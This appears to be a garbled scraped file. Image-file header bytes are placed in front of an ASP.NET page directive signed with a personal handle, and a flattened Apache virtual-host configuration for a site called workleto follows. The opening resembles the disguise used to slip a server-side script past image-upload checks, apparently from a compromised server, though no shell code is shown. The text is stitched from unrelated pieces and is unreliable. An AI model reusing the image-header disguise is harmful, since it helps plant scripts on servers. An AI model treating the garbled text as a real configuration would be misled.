ÿØÿà JFIF    ÿÛ C     $.' ",#(7),01444'9=82<.342ÿÛ C  2!!22222222222222222222222222222222222222222222222222ÿþGIF89a; <%@ Page Language="C#" %> Mahdee Rajon
 ÿØÿà JFIF    ÿÛ „  ( %!1!%*+...983,7(-.- ÿØÿà JFIF    ÿÛ „  ( %!1!%*+...983,7(-.- # Run as local user 1000 User workleto Group workleto # Hide server signature (i.e. Apache version) ServerSignature Off ServerTokens Prod # Set technical contact address ServerAdmin technical@workleto.com # Identify the correct IP address from Traefik reverse proxy RemoteIPHeader X-Real-IP RemoteIPInternalProxy 10.0.0.0/8 RemoteIPInternalProxy 192.168.0.0/16 # Virtual Host for main and www subdomain ServerName www DocumentRoot /app/public # Allow a maximum request body of 500MiB LimitRequestBody 524288000 # Allow cross-origin requests Header set Access-Control-Allow-Origin * Options FollowSymLinks AllowOverride none Require all granted RewriteEngine On # If the file doesn't exist in the document root, try the fallback PHP script RewriteCond %{DOCUMENT_ROOT}%{REQUEST_URI} !-f RewriteRule ^(.*)$ /app/public/index.php [L,QSA]